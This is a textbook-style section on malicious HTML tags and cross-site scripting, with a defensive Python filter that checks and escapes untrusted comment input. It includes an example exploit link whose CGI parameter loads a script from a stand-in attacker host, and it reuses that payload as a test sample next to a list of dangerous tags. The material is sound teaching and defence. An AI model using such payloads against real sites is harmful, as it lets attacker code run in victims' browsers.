11.13 Evil HTML Tags and Script

In early 2000, the CERT Coordination Center reported that malicious HTML tags or script embedded in a Web page could compromise the computer running the Web browser or even be used to attack other servers. The tags that may be used to do this include <SCRIPT>, <APPLET>, <OBJECT>, and <EMBED>. Servers should not accept HTML containing these tags from untrusted sources. It would be a very good idea to disable these features in your browser, if possible, for higher security. Of course, this would end all those cool Java hacks. Other tags, such as the <FORM> tag, can also be abused.

A typical exploit would be the following: a link whose URL carries a script tag in a CGI parameter, so that a server which echoes the parameter back into a page unfiltered will serve the attacker's script to the victim's browser.

    <A HREF="http://pentacorp.com/comment.cgi?mycomment=<SCRIPT src='http://cracker.com/exploit'></SCRIPT>"> Click for image</A>

Starting with version 4.x, Netscape tries to limit these exploits by requiring the URL inside the script to be on the same system as the page in which it appears. Most major sites filter these tags out of any pages that are assembled from data originating outside their site and therefore untrusted.
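The server-side filtering this section recommends can be shown in a few lines. The following is an added example, not code from the book: a small Python module that a CGI program could use to check an untrusted parameter such as the mycomment value above for the tags named in this section, and to render accepted comments with the markup characters escaped so the browser treats them as text. The tag list, the function names and the sample inputs are my own constructions; the check also URL-decodes the value first, because the tags arrive percent-encoded in a query string.

```python
import html
import re
from urllib.parse import unquote_plus

# The tag names this section lists as abusable; matched case-insensitively.
DANGEROUS_TAGS = ("script", "applet", "object", "embed", "form")

# Matches an opening or closing tag for any name above, e.g. <SCRIPT src=...>, </script>,
# including whitespace padding such as "< script" that a naive filter would miss.
_TAG_RE = re.compile(
    r"<\s*/?\s*(" + "|".join(DANGEROUS_TAGS) + r")\b", re.IGNORECASE
)


def find_dangerous_tags(fragment):
    """Return the sorted lowercase names of disallowed tags found in an untrusted
    fragment.  The fragment is URL-decoded first so that a percent-encoded tag in
    a query-string value (e.g. %3CSCRIPT) is still caught."""
    decoded = unquote_plus(fragment)
    return sorted({m.group(1).lower() for m in _TAG_RE.finditer(decoded)})


def render_comment(comment):
    """Escape <, >, &, and quotes so the comment is displayed literally and is
    never interpreted as markup when placed into the served page."""
    return html.escape(comment, quote=True)


def accept_comment(comment):
    """Policy used by a hypothetical comment.cgi: reject a comment that contains
    any disallowed tag, otherwise return the escaped text ready for the page."""
    found = find_dangerous_tags(comment)
    if found:
        raise ValueError("rejected: disallowed tags " + ", ".join(found))
    return render_comment(comment)


if __name__ == "__main__":
    # Constructed sample inputs: the payload from the link in this section,
    # a harmless comment, and a percent-encoded tag as it would arrive in a URL.
    samples = [
        "<SCRIPT src='http://cracker.com/exploit'></SCRIPT>",
        "Nice picture, <b>thanks</b>",
        "%3Cembed%20src%3D%27x%27%3E",
    ]
    for s in samples:
        try:
            print("accepted:", accept_comment(s))
        except ValueError as err:
            print(err)
```

Escaping on output is the part that actually closes the hole; the tag check is a second layer that lets the server log and refuse suspicious submissions rather than silently neutralising them.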